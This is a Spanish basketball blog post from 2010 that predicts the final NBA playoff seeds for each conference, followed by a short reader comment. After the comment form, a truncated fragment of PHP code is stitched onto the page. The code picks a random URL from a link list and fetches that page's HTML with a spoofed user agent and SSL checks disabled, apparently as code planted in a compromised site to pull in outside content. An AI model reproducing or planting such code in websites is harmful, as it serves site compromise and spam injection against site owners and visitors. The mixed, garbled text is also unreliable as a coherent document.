Informe #17

05 de April de 2010 por TheDeerHunter

Hoy nos saldremos de nuestro clásico formato de informe para tratar de analizar qué es lo que le queda por ofrecernos a la temporada regular y cómo quedará la configuración final de los playoffs.

EAST:

1.- CLEVELAND CAVALIERS: Tienen los deberes hechos. Contarán con ventaja campo mientras dure su concurso.

2.- ORLANDO MAGIC: Serán sin lugar a dudas segundos en el Este aunque todavía deben luchar por asegurarse ventaja campo ante una hipotética final contra Lakers. Por delante tienen 4 partidos contra equipos de lotería y otro más en Cleveland. Se irán a 58 victorias de exigencia para los amarillos.

3.- ATLANTA HAWKS: Una victoria de ventaja frente a los Celtics para conservar la 3ª plaza. No les resta un calendario sencillo: 4 fuera, uno de ellos en Charlotte y dos incómodos en casa contra Toronto y Cleveland. Sólo deberían perder un partido si quieren asegurarse el evitar a los Cavs en 2ª ronda.

4.- BOSTON CELTICS: Clave para ellos la lesión de Bogut. Podría facilitarles el acceso a la 2ª plaza del Este con dos partidos pendientes frente los Bucks de los 6 que les quedan y, adicionalmente, también podría facilitarles el acceso a semifinales de conferencia, siendo éste un posible cruce de primera ronda. Para que esto llegue a suceder, los verdes tienen que ganar además a Chicago, Toronto y Knicks fuera y a los Wizards en casa. Es asequible.

5.- MIAMI HEAT: Acumulan 8 victorias seguidas y no es de extrañar que terminen siendo 13. Su calendario es cómodo. Con todos los vaivenes terminarán otro año más siendo quintos en el Este.

6.- MILWAUKEE BUCKS: ¿Sigue estando vigente lo del “Fear the Deer”? Golpe durísimo que no sólo pone a prueba el carácter ganador de un grupo tan prometedor. Les queda por delante 3 choques terribles contra Atlanta y Boston jugándose muchas cosas, otro más contra Chicago, que deberían ganar para quedarse donde están. Los otros dos son más asequibles contra Sixers y Nets. De todas formas el quedar sextos o séptimos es lo que menos les debería preocupar ahora mismo.

7.- CHARLOTTE BOBCATS: Entre un posible rival Orlando y otro como Hawks o Celtics hay sutiles diferencias. Tampoco sabemos si serán suficientes para motivarles a echar el resto remontando dos partidos de desventaja. Deberán ganar 3 más que los Bucks. Básicamente será ganar a 5 de estos 6 rivales: Atlanta, @New Orleans, @Houston, Detroit, New Jersey y @Chicago. Vamos, que lo tienen complicado aunque lo intenten.

8.- TORONTO RAPTORS VS CHICAGO BULLS. Se juegan entre ellos casi una final el domingo que viene, en Canadá. Quien gane ese partido tendrá la mayoría de papeletas para llevarse el premio de jugar contra El Elegido en primera ronda.

WEST:

1.- LOS ÁNGELES LAKERS: 4 derrotas en los últimos 6 partidos. Los Lakers son los campeones más criticados que uno haya visto, precisamente por cosas como esta. Suerte que esas derrotas apenas afectan su planificación para el momento de la verdad. Con total probabilidad serán cabeza de serie en su parte del cuadro. Otra cosa es la hipotética final. Muchos aseguran que la ventaja campo no es tan decisiva con el formato 2-3-2. Yo no lo tengo tan claro.

2.- DALLAS MAVERICKS: Los Mavs tampoco están siendo nada del otro mundo en un Oeste tan salvaje o más que siempre. Con todo, tienen en su mano aguantar la segunda plaza y 3 choques contra Memphis, Kings y Clippers que en estas circunstancias son un caramelo.

3.- DENVER NUGGETS: Thunder, Lakers, Spurs, Grizzlies y Suns. 3 en casa, al menos. En el estado de forma en el que se encuentran y ante este calendario, mucho me temo que se caerán a la 5ª plaza.

4.- UTAH JAZZ: Thunder, Rockets, Hornets, Warriors y Suns. 3 de ellos fuera de casa. Les puede valer perder alguno de los 4 primeros. Jugar la plaza en el último partido, contra tu máximo rival, siendo locales en una cancha como la del Energy Solutions Arenta de Salt Lake es algo que firmaríamos casi todos.

5.- PHOENIX SUNS: Spurs, Thunder, Rockets, Nuggets y Jazz. Es el equipo más en forma ahora mismo del Oeste, pero el calendario que les queda por sufrir es complicadísimo. No obstante es muy posible que suban algún puesto todavía.

6.- OKLAHOMA THUNDER: Han alcanzado un hito histórico y no se relajan un ápice. Subir lo tienen difícil y su objetivo debe de ser evitar a Lakers en primera ronda. El penúltimo partido en Portland dictaminará cuantas opciones tienen de lograrlo. Todas las parejas de baile que quedan de aquí al final son verdaderamente feas.

7.- SAN ANTONIO SPURS: Los Spurs siempre se activan cuando llegan estas fechas. Lo de Ginobili es increíble. Se hablaba que intentarán evitar a Lakers. Con Kings, Grizzlies y Wolves por en medio no van a tener ningún problema.

8.- PORTLAND TRAILBLAZERS: Su objetivo no es otro que evitar a Lakers y su rival en esta pelea no es otro sinó Oklahoma. Tienen un calendario sutilmente más sencillo que ellos, pero se la juegan a la carta de ganarles en el Rose Garden el día 12. Primera final del curso para ellos.

Comenta

51 comentarios a esta entrada

  1. LEmontus dice:
    #1

    tu si que sabes jajaj

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>